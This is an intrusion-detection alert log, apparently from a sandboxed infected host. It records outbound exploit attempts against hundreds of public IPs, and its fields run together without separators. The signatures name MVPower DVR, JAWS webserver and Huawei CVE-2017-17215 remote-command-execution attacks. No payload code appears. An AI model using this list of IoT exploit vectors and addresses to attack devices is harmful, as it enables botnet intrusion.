                                                            192.168.2.2347.99.247.17737488802025883 01/26/24-15:32:45.240841TCP2025883ET EXPLOIT MVPower DVR Shell UCE3748880192.168.2.2347.99.247.177
                                                            192.168.2.23172.103.183.22433132802030092 01/26/24-15:31:41.395483TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3313280192.168.2.23172.103.183.224
                                                            192.168.2.2354.169.210.7344226802025883 01/26/24-15:32:56.420174TCP2025883ET EXPLOIT MVPower DVR Shell UCE4422680192.168.2.2354.169.210.73
                                                            192.168.2.2344.211.68.17335700802030092 01/26/24-15:31:43.857382TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3570080192.168.2.2344.211.68.173
                                                            192.168.2.2334.49.218.22734324802025883 01/26/24-15:31:51.202892TCP2025883ET EXPLOIT MVPower DVR Shell UCE3432480192.168.2.2334.49.218.227
                                                            192.168.2.232.37.191.14334212802025883 01/26/24-15:32:33.834444TCP2025883ET EXPLOIT MVPower DVR Shell UCE3421280192.168.2.232.37.191.143
                                                            192.168.2.2352.57.190.2539250802030092 01/26/24-15:31:12.751292TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3925080192.168.2.2352.57.190.25
                                                            192.168.2.23149.28.12.20146238802030092 01/26/24-15:32:41.674136TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4623880192.168.2.23149.28.12.201
                                                            192.168.2.23190.166.87.16747940802025883 01/26/24-15:31:12.177184TCP2025883ET EXPLOIT MVPower DVR Shell UCE4794080192.168.2.23190.166.87.167
                                                            192.168.2.23178.242.124.21358878802030092 01/26/24-15:31:58.866499TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5887880192.168.2.23178.242.124.213
                                                            192.168.2.23222.109.127.9046800802030092 01/26/24-15:32:01.846679TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4680080192.168.2.23222.109.127.90
                                                            192.168.2.2313.35.52.6847190802030092 01/26/24-15:32:41.764801TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4719080192.168.2.2313.35.52.68
                                                            192.168.2.23142.252.201.24755670802030092 01/26/24-15:31:18.623898TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5567080192.168.2.23142.252.201.247
                                                            192.168.2.23121.144.178.3158814802030092 01/26/24-15:31:12.317058TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5881480192.168.2.23121.144.178.31
                                                            192.168.2.2369.58.6.20547720802030092 01/26/24-15:32:46.232134TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4772080192.168.2.2369.58.6.205
                                                            192.168.2.23136.243.128.17336892802030092 01/26/24-15:32:04.624562TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3689280192.168.2.23136.243.128.173
                                                            192.168.2.2313.33.79.19236726802030092 01/26/24-15:31:33.398550TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3672680192.168.2.2313.33.79.192
                                                            192.168.2.2318.169.247.8253346802025883 01/26/24-15:31:33.204599TCP2025883ET EXPLOIT MVPower DVR Shell UCE5334680192.168.2.2318.169.247.82
                                                            192.168.2.23107.172.253.17556648802025883 01/26/24-15:31:26.762471TCP2025883ET EXPLOIT MVPower DVR Shell UCE5664880192.168.2.23107.172.253.175
                                                            192.168.2.23154.3.88.6154542802030092 01/26/24-15:32:11.576925TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5454280192.168.2.23154.3.88.61
                                                            192.168.2.2323.49.33.2453916802030092 01/26/24-15:31:30.578429TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5391680192.168.2.2323.49.33.24
                                                            192.168.2.2381.60.196.10654910802025883 01/26/24-15:31:50.047490TCP2025883ET EXPLOIT MVPower DVR Shell UCE5491080192.168.2.2381.60.196.106
                                                            192.168.2.2323.60.235.16253328802025883 01/26/24-15:32:58.656896TCP2025883ET EXPLOIT MVPower DVR Shell UCE5332880192.168.2.2323.60.235.162
                                                            192.168.2.23156.241.121.355228372152835222 01/26/24-15:31:35.990854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522837215192.168.2.23156.241.121.3
                                                            192.168.2.2338.173.86.11947328802025883 01/26/24-15:31:51.388493TCP2025883ET EXPLOIT MVPower DVR Shell UCE4732880192.168.2.2338.173.86.119
                                                            192.168.2.23156.244.93.14353116802025883 01/26/24-15:31:43.590528TCP2025883ET EXPLOIT MVPower DVR Shell UCE5311680192.168.2.23156.244.93.143
                                                            192.168.2.23103.161.34.8042092802030092 01/26/24-15:32:23.795964TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4209280192.168.2.23103.161.34.80
                                                            192.168.2.235.130.129.7859124802030092 01/26/24-15:32:41.767636TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5912480192.168.2.235.130.129.78
                                                            192.168.2.2338.165.105.3057168802030092 01/26/24-15:32:38.806869TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5716880192.168.2.2338.165.105.30
                                                            192.168.2.2386.159.25.10833472802030092 01/26/24-15:32:53.508151TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3347280192.168.2.2386.159.25.108
                                                            192.168.2.23211.25.120.21259646802030092 01/26/24-15:33:01.663963TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5964680192.168.2.23211.25.120.212
                                                            192.168.2.23156.244.93.14353284802025883 01/26/24-15:31:47.591942TCP2025883ET EXPLOIT MVPower DVR Shell UCE5328480192.168.2.23156.244.93.143
                                                            192.168.2.2343.248.130.25449038802030092 01/26/24-15:31:18.303147TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4903880192.168.2.2343.248.130.254
                                                            192.168.2.2395.217.64.1435260802025883 01/26/24-15:31:44.835063TCP2025883ET EXPLOIT MVPower DVR Shell UCE3526080192.168.2.2395.217.64.14
                                                            192.168.2.23149.91.88.4733390802030092 01/26/24-15:32:23.589503TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3339080192.168.2.23149.91.88.47
                                                            192.168.2.23195.87.80.16555956802030092 01/26/24-15:31:44.820074TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5595680192.168.2.23195.87.80.165
                                                            192.168.2.23208.69.96.8050392802030092 01/26/24-15:31:23.456047TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5039280192.168.2.23208.69.96.80
                                                            192.168.2.2323.47.10.2860276802030092 01/26/24-15:33:01.789275TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6027680192.168.2.2323.47.10.28
                                                            192.168.2.23216.197.110.5841542802025883 01/26/24-15:32:11.802137TCP2025883ET EXPLOIT MVPower DVR Shell UCE4154280192.168.2.23216.197.110.58
                                                            192.168.2.23103.67.246.15955592802030092 01/26/24-15:32:11.805602TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5559280192.168.2.23103.67.246.159
                                                            192.168.2.23154.80.190.13136832802025883 01/26/24-15:31:12.938827TCP2025883ET EXPLOIT MVPower DVR Shell UCE3683280192.168.2.23154.80.190.131
                                                            192.168.2.23192.126.135.9653502802025883 01/26/24-15:31:47.579147TCP2025883ET EXPLOIT MVPower DVR Shell UCE5350280192.168.2.23192.126.135.96
                                                            192.168.2.2323.14.115.11547294802030092 01/26/24-15:32:41.743983TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4729480192.168.2.2323.14.115.115
                                                            192.168.2.2389.161.183.3245298802030092 01/26/24-15:32:47.933137TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4529880192.168.2.2389.161.183.32
                                                            192.168.2.23217.92.41.22753160802030092 01/26/24-15:31:12.833746TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5316080192.168.2.23217.92.41.227
                                                            192.168.2.23112.192.19.16338874802030092 01/26/24-15:32:18.529901TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3887480192.168.2.23112.192.19.163
                                                            192.168.2.23107.142.58.6338674802030092 01/26/24-15:32:30.553653TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3867480192.168.2.23107.142.58.63
                                                            192.168.2.23223.252.6.2145092802025883 01/26/24-15:32:37.032412TCP2025883ET EXPLOIT MVPower DVR Shell UCE4509280192.168.2.23223.252.6.21
                                                            192.168.2.23216.152.233.16838206802030092 01/26/24-15:31:23.737000TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3820680192.168.2.23216.152.233.168
                                                            192.168.2.2352.45.114.19360734802030092 01/26/24-15:32:44.623354TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6073480192.168.2.2352.45.114.193
                                                            192.168.2.2323.202.233.18551830802025883 01/26/24-15:31:23.700788TCP2025883ET EXPLOIT MVPower DVR Shell UCE5183080192.168.2.2323.202.233.185
                                                            192.168.2.2334.128.166.8250578802025883 01/26/24-15:32:25.383055TCP2025883ET EXPLOIT MVPower DVR Shell UCE5057880192.168.2.2334.128.166.82
                                                            192.168.2.2323.43.226.25339442802030092 01/26/24-15:32:58.799927TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3944280192.168.2.2323.43.226.253
                                                            192.168.2.23104.81.5.20748658802030092 01/26/24-15:31:55.581361TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4865880192.168.2.23104.81.5.207
                                                            192.168.2.23173.26.90.11638332802030092 01/26/24-15:31:01.122556TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3833280192.168.2.23173.26.90.116
                                                            192.168.2.23161.47.33.18353088802030092 01/26/24-15:32:15.824991TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5308880192.168.2.23161.47.33.183
                                                            192.168.2.2352.109.60.2139194802030092 01/26/24-15:32:25.609180TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3919480192.168.2.2352.109.60.21
                                                            192.168.2.23124.198.30.11542388802030092 01/26/24-15:32:09.698068TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4238880192.168.2.23124.198.30.115
                                                            192.168.2.23107.22.76.4153952802025883 01/26/24-15:32:12.670692TCP2025883ET EXPLOIT MVPower DVR Shell UCE5395280192.168.2.23107.22.76.41
                                                            192.168.2.23135.125.212.234662802030092 01/26/24-15:32:32.808841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3466280192.168.2.23135.125.212.2
                                                            192.168.2.2358.27.229.5954696802025883 01/26/24-15:32:18.457147TCP2025883ET EXPLOIT MVPower DVR Shell UCE5469680192.168.2.2358.27.229.59
                                                            192.168.2.23156.241.94.10647522372152829579 01/26/24-15:32:48.825043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752237215192.168.2.23156.241.94.106
                                                            192.168.2.23116.203.0.3550408802025883 01/26/24-15:32:01.763592TCP2025883ET EXPLOIT MVPower DVR Shell UCE5040880192.168.2.23116.203.0.35
                                                            192.168.2.2386.22.49.25350780802025883 01/26/24-15:32:21.592093TCP2025883ET EXPLOIT MVPower DVR Shell UCE5078080192.168.2.2386.22.49.253
                                                            192.168.2.23103.221.252.5251938802030092 01/26/24-15:32:32.832220TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5193880192.168.2.23103.221.252.52
                                                            192.168.2.23121.126.118.10247338802025883 01/26/24-15:31:01.582991TCP2025883ET EXPLOIT MVPower DVR Shell UCE4733880192.168.2.23121.126.118.102
                                                            192.168.2.23221.194.131.8758524802025883 01/26/24-15:31:41.925411TCP2025883ET EXPLOIT MVPower DVR Shell UCE5852480192.168.2.23221.194.131.87
                                                            192.168.2.23156.254.67.20558516372152829579 01/26/24-15:31:52.465785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851637215192.168.2.23156.254.67.205
                                                            192.168.2.23119.45.129.20653114802030092 01/26/24-15:32:25.279467TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5311480192.168.2.23119.45.129.206
                                                            192.168.2.2318.165.59.19938728802025883 01/26/24-15:32:01.702335TCP2025883ET EXPLOIT MVPower DVR Shell UCE3872880192.168.2.2318.165.59.199
                                                            192.168.2.2393.193.221.12535076802025883 01/26/24-15:32:19.779362TCP2025883ET EXPLOIT MVPower DVR Shell UCE3507680192.168.2.2393.193.221.125
                                                            192.168.2.2385.192.198.14541010802030092 01/26/24-15:32:11.645204TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4101080192.168.2.2385.192.198.145
                                                            192.168.2.23156.244.93.14353014802025883 01/26/24-15:31:41.558394TCP2025883ET EXPLOIT MVPower DVR Shell UCE5301480192.168.2.23156.244.93.143
                                                            192.168.2.23104.107.149.20444228802025883 01/26/24-15:31:47.457328TCP2025883ET EXPLOIT MVPower DVR Shell UCE4422880192.168.2.23104.107.149.204
                                                            192.168.2.2364.68.224.6848616802030092 01/26/24-15:31:55.514444TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4861680192.168.2.2364.68.224.68
                                                            192.168.2.23192.145.232.19832932802030092 01/26/24-15:31:18.095689TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3293280192.168.2.23192.145.232.198
                                                            192.168.2.23147.46.47.20155390802030092 01/26/24-15:31:44.866076TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5539080192.168.2.23147.46.47.201
                                                            192.168.2.2389.232.184.7048042802025883 01/26/24-15:32:12.076459TCP2025883ET EXPLOIT MVPower DVR Shell UCE4804280192.168.2.2389.232.184.70
                                                            192.168.2.2373.223.88.24932972802030092 01/26/24-15:31:16.960028TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3297280192.168.2.2373.223.88.249
                                                            192.168.2.2364.9.223.3838386802030092 01/26/24-15:33:02.010793TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3838680192.168.2.2364.9.223.38
                                                            192.168.2.23104.24.247.1654216802025883 01/26/24-15:32:42.593097TCP2025883ET EXPLOIT MVPower DVR Shell UCE5421680192.168.2.23104.24.247.16
                                                            192.168.2.2323.194.29.14435718802025883 01/26/24-15:31:17.004706TCP2025883ET EXPLOIT MVPower DVR Shell UCE3571880192.168.2.2323.194.29.144
                                                            192.168.2.23123.56.30.12146802802025883 01/26/24-15:31:52.000684TCP2025883ET EXPLOIT MVPower DVR Shell UCE4680280192.168.2.23123.56.30.121
                                                            192.168.2.23149.202.117.7637802802030092 01/26/24-15:31:12.472984TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3780280192.168.2.23149.202.117.76
                                                            192.168.2.2314.245.88.10533686802030092 01/26/24-15:32:34.039201TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3368680192.168.2.2314.245.88.105
                                                            192.168.2.2352.7.93.3850156802025883 01/26/24-15:31:55.485744TCP2025883ET EXPLOIT MVPower DVR Shell UCE5015680192.168.2.2352.7.93.38
                                                            192.168.2.23154.38.124.18233456802030092 01/26/24-15:32:19.617457TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3345680192.168.2.23154.38.124.182
                                                            192.168.2.2323.202.252.17459934802030092 01/26/24-15:32:30.867097TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5993480192.168.2.2323.202.252.174
                                                            192.168.2.23116.202.54.2452170802030092 01/26/24-15:33:01.962315TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5217080192.168.2.23116.202.54.24
                                                            192.168.2.23185.133.20.854662802025883 01/26/24-15:32:19.590376TCP2025883ET EXPLOIT MVPower DVR Shell UCE5466280192.168.2.23185.133.20.8
                                                            192.168.2.23159.135.59.13646244802025883 01/26/24-15:32:42.602169TCP2025883ET EXPLOIT MVPower DVR Shell UCE4624480192.168.2.23159.135.59.136
                                                            192.168.2.2313.225.26.17856352802025883 01/26/24-15:31:49.538944TCP2025883ET EXPLOIT MVPower DVR Shell UCE5635280192.168.2.2313.225.26.178
                                                            192.168.2.23154.197.204.14558404802025883 01/26/24-15:31:44.628404TCP2025883ET EXPLOIT MVPower DVR Shell UCE5840480192.168.2.23154.197.204.145
                                                            192.168.2.23185.114.96.7050582802030092 01/26/24-15:31:22.833185TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5058280192.168.2.23185.114.96.70
                                                            192.168.2.23212.36.196.939926802025883 01/26/24-15:31:01.231763TCP2025883ET EXPLOIT MVPower DVR Shell UCE3992680192.168.2.23212.36.196.9
                                                            192.168.2.23192.252.184.9634812802030092 01/26/24-15:32:20.331624TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3481280192.168.2.23192.252.184.96
                                                            192.168.2.23223.119.221.2845996802030092 01/26/24-15:32:43.176340TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4599680192.168.2.23223.119.221.28
                                                            192.168.2.23121.194.9.19857954802030092 01/26/24-15:31:51.436086TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5795480192.168.2.23121.194.9.198
                                                            192.168.2.23190.188.119.23743640802025883 01/26/24-15:31:32.992616TCP2025883ET EXPLOIT MVPower DVR Shell UCE4364080192.168.2.23190.188.119.237
                                                            192.168.2.2335.74.9.15052340802030092 01/26/24-15:32:01.875204TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5234080192.168.2.2335.74.9.150
                                                            192.168.2.2320.31.197.739198802030092 01/26/24-15:31:27.808194TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3919880192.168.2.2320.31.197.7
                                                            192.168.2.2334.149.45.23655346802025883 01/26/24-15:31:47.560632TCP2025883ET EXPLOIT MVPower DVR Shell UCE5534680192.168.2.2334.149.45.236
                                                            192.168.2.23104.24.247.1654216802030092 01/26/24-15:32:42.593097TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5421680192.168.2.23104.24.247.16
                                                            192.168.2.2338.59.4.25037470802030092 01/26/24-15:31:30.832217TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3747080192.168.2.2338.59.4.250
                                                            192.168.2.23117.215.83.25541036802025883 01/26/24-15:31:52.153014TCP2025883ET EXPLOIT MVPower DVR Shell UCE4103680192.168.2.23117.215.83.255
                                                            192.168.2.23104.87.193.15950068802030092 01/26/24-15:32:39.122866TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5006880192.168.2.23104.87.193.159
                                                            192.168.2.2324.225.30.2246538802025883 01/26/24-15:33:00.621045TCP2025883ET EXPLOIT MVPower DVR Shell UCE4653880192.168.2.2324.225.30.22
                                                            192.168.2.2346.232.249.23334358802030092 01/26/24-15:31:58.828965TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3435880192.168.2.2346.232.249.233
                                                            192.168.2.2396.11.176.8641084802025883 01/26/24-15:32:11.726295TCP2025883ET EXPLOIT MVPower DVR Shell UCE4108480192.168.2.2396.11.176.86
                                                            192.168.2.23173.26.90.11638332802025883 01/26/24-15:31:01.122556TCP2025883ET EXPLOIT MVPower DVR Shell UCE3833280192.168.2.23173.26.90.116
                                                            192.168.2.2365.0.126.4658778802025883 01/26/24-15:32:07.167336TCP2025883ET EXPLOIT MVPower DVR Shell UCE5877880192.168.2.2365.0.126.46
                                                            192.168.2.2364.44.24.19941134802025883 01/26/24-15:31:52.674016TCP2025883ET EXPLOIT MVPower DVR Shell UCE4113480192.168.2.2364.44.24.199
                                                            192.168.2.2378.187.235.23659344802025883 01/26/24-15:32:32.918898TCP2025883ET EXPLOIT MVPower DVR Shell UCE5934480192.168.2.2378.187.235.236
                                                            192.168.2.23198.48.58.4137276802025883 01/26/24-15:32:44.634580TCP2025883ET EXPLOIT MVPower DVR Shell UCE3727680192.168.2.23198.48.58.41
                                                            192.168.2.23120.24.228.4457014802025883 01/26/24-15:32:46.097536TCP2025883ET EXPLOIT MVPower DVR Shell UCE5701480192.168.2.23120.24.228.44
                                                            192.168.2.2343.140.243.5641060802025883 01/26/24-15:31:14.053818TCP2025883ET EXPLOIT MVPower DVR Shell UCE4106080192.168.2.2343.140.243.56
                                                            192.168.2.2365.9.190.8041628802030092 01/26/24-15:31:51.771759TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4162880192.168.2.2365.9.190.80
                                                            192.168.2.2394.137.77.16234182802030092 01/26/24-15:32:30.876888TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3418280192.168.2.2394.137.77.162
                                                            192.168.2.23134.209.129.20445966802030092 01/26/24-15:31:26.756022TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4596680192.168.2.23134.209.129.204
                                                            192.168.2.23221.143.28.4843484802030092 01/26/24-15:32:59.009997TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4348480192.168.2.23221.143.28.48
                                                            192.168.2.23160.124.34.10244892802025883 01/26/24-15:32:23.676383TCP2025883ET EXPLOIT MVPower DVR Shell UCE4489280192.168.2.23160.124.34.102
                                                            192.168.2.23121.126.118.10247338802030092 01/26/24-15:31:01.582991TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4733880192.168.2.23121.126.118.102
                                                            192.168.2.23156.77.134.10758310372152835222 01/26/24-15:31:28.507560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831037215192.168.2.23156.77.134.107
                                                            192.168.2.23188.210.221.15439790802025883 01/26/24-15:32:23.860113TCP2025883ET EXPLOIT MVPower DVR Shell UCE3979080192.168.2.23188.210.221.154
                                                            192.168.2.23104.236.253.17456960802030092 01/26/24-15:32:32.634718TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5696080192.168.2.23104.236.253.174
                                                            192.168.2.23138.2.243.10434394802030092 01/26/24-15:32:32.597404TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3439480192.168.2.23138.2.243.104
                                                            192.168.2.23123.136.83.1046740802025883 01/26/24-15:31:47.683671TCP2025883ET EXPLOIT MVPower DVR Shell UCE4674080192.168.2.23123.136.83.10
                                                            192.168.2.23156.77.134.8238044372152829579 01/26/24-15:31:52.879041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804437215192.168.2.23156.77.134.82
                                                            192.168.2.23148.251.126.8558662802030092 01/26/24-15:32:21.791036TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5866280192.168.2.23148.251.126.85
                                                            192.168.2.23154.177.20.19240328802030092 01/26/24-15:31:30.679568TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4032880192.168.2.23154.177.20.192
                                                            192.168.2.23156.250.15.7359280802030092 01/26/24-15:31:19.040568TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5928080192.168.2.23156.250.15.73
                                                            192.168.2.2323.33.209.7442186802025883 01/26/24-15:31:33.844677TCP2025883ET EXPLOIT MVPower DVR Shell UCE4218680192.168.2.2323.33.209.74
                                                            192.168.2.23163.22.230.7260486802030092 01/26/24-15:32:50.944088TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6048680192.168.2.23163.22.230.72
                                                            192.168.2.23108.156.238.15959868802025883 01/26/24-15:32:18.244719TCP2025883ET EXPLOIT MVPower DVR Shell UCE5986880192.168.2.23108.156.238.159
                                                            192.168.2.23210.158.145.5749402802030092 01/26/24-15:32:28.374838TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4940280192.168.2.23210.158.145.57
                                                            192.168.2.2323.32.96.459814802025883 01/26/24-15:32:12.871882TCP2025883ET EXPLOIT MVPower DVR Shell UCE5981480192.168.2.2323.32.96.4
                                                            192.168.2.232.23.231.4857626802030092 01/26/24-15:32:48.222059TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5762680192.168.2.232.23.231.48
                                                            192.168.2.2349.40.48.5248506802025883 01/26/24-15:31:27.006278TCP2025883ET EXPLOIT MVPower DVR Shell UCE4850680192.168.2.2349.40.48.52
                                                            192.168.2.23217.243.251.11134724802025883 01/26/24-15:32:21.810147TCP2025883ET EXPLOIT MVPower DVR Shell UCE3472480192.168.2.23217.243.251.111
                                                            192.168.2.2323.46.227.11555366802025883 01/26/24-15:32:50.641050TCP2025883ET EXPLOIT MVPower DVR Shell UCE5536680192.168.2.2323.46.227.115
                                                            192.168.2.23152.0.21.13756240802030092 01/26/24-15:31:31.568754TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5624080192.168.2.23152.0.21.137
                                                            192.168.2.2395.101.219.23744662802030092 01/26/24-15:32:50.045255TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4466280192.168.2.2395.101.219.237
                                                            192.168.2.23222.236.125.13744992802030092 01/26/24-15:31:44.173874TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4499280192.168.2.23222.236.125.137
                                                            192.168.2.23217.255.164.2052728802025883 01/26/24-15:32:41.969791TCP2025883ET EXPLOIT MVPower DVR Shell UCE5272880192.168.2.23217.255.164.20
                                                            192.168.2.23156.241.74.11249042372152829579 01/26/24-15:31:13.367598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904237215192.168.2.23156.241.74.112
                                                            192.168.2.23117.51.135.2356360802030092 01/26/24-15:31:27.355741TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5636080192.168.2.23117.51.135.23
                                                            192.168.2.23172.65.16.15349056802025883 01/26/24-15:31:58.620312TCP2025883ET EXPLOIT MVPower DVR Shell UCE4905680192.168.2.23172.65.16.153
                                                            192.168.2.23107.170.192.17952012802030092 01/26/24-15:31:30.586907TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5201280192.168.2.23107.170.192.179
                                                            192.168.2.2344.228.83.2351596802030092 01/26/24-15:31:36.754031TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5159680192.168.2.2344.228.83.23
                                                            192.168.2.23168.76.87.954362802025883 01/26/24-15:31:37.382339TCP2025883ET EXPLOIT MVPower DVR Shell UCE5436280192.168.2.23168.76.87.9
                                                            192.168.2.232.187.2.18036322802030092 01/26/24-15:32:19.863183TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3632280192.168.2.232.187.2.180
                                                            192.168.2.23106.252.219.2838206802030092 01/26/24-15:31:54.023823TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3820680192.168.2.23106.252.219.28
                                                            192.168.2.2352.57.190.2539250802025883 01/26/24-15:31:12.751292TCP2025883ET EXPLOIT MVPower DVR Shell UCE3925080192.168.2.2352.57.190.25
                                                            192.168.2.23156.241.113.19652330372152835222 01/26/24-15:31:19.037267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233037215192.168.2.23156.241.113.196
                                                            192.168.2.2345.157.202.2638098802030092 01/26/24-15:31:43.792134TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3809880192.168.2.2345.157.202.26
                                                            192.168.2.2386.159.25.10833472802025883 01/26/24-15:32:53.508151TCP2025883ET EXPLOIT MVPower DVR Shell UCE3347280192.168.2.2386.159.25.108
                                                            192.168.2.23184.24.204.4847744802025883 01/26/24-15:31:26.778442TCP2025883ET EXPLOIT MVPower DVR Shell UCE4774480192.168.2.23184.24.204.48
                                                            192.168.2.23174.141.213.15253818802025883 01/26/24-15:32:28.539246TCP2025883ET EXPLOIT MVPower DVR Shell UCE5381880192.168.2.23174.141.213.152
                                                            192.168.2.2318.160.226.10542168802025883 01/26/24-15:31:58.618951TCP2025883ET EXPLOIT MVPower DVR Shell UCE4216880192.168.2.2318.160.226.105
                                                            192.168.2.23191.82.36.1150732802025883 01/26/24-15:32:53.548901TCP2025883ET EXPLOIT MVPower DVR Shell UCE5073280192.168.2.23191.82.36.11
                                                            192.168.2.23212.23.145.11457594802025883 01/26/24-15:32:21.797565TCP2025883ET EXPLOIT MVPower DVR Shell UCE5759480192.168.2.23212.23.145.114
                                                            192.168.2.2338.254.102.19336296802030092 01/26/24-15:31:41.705239TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3629680192.168.2.2338.254.102.193
                                                            192.168.2.2379.120.228.19036614802030092 01/26/24-15:31:55.590446TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3661480192.168.2.2379.120.228.190
                                                            192.168.2.23106.52.83.14857368802025883 01/26/24-15:32:07.993078TCP2025883ET EXPLOIT MVPower DVR Shell UCE5736880192.168.2.23106.52.83.148
                                                            192.168.2.2318.180.111.20454250802025883 01/26/24-15:32:18.971768TCP2025883ET EXPLOIT MVPower DVR Shell UCE5425080192.168.2.2318.180.111.204
                                                            192.168.2.23119.63.71.3550196802030092 01/26/24-15:31:33.480876TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5019680192.168.2.23119.63.71.35
                                                            192.168.2.23156.244.93.14353030802030092 01/26/24-15:31:41.576601TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5303080192.168.2.23156.244.93.143
                                                            192.168.2.23185.203.117.8648890802025883 01/26/24-15:32:09.635936TCP2025883ET EXPLOIT MVPower DVR Shell UCE4889080192.168.2.23185.203.117.86
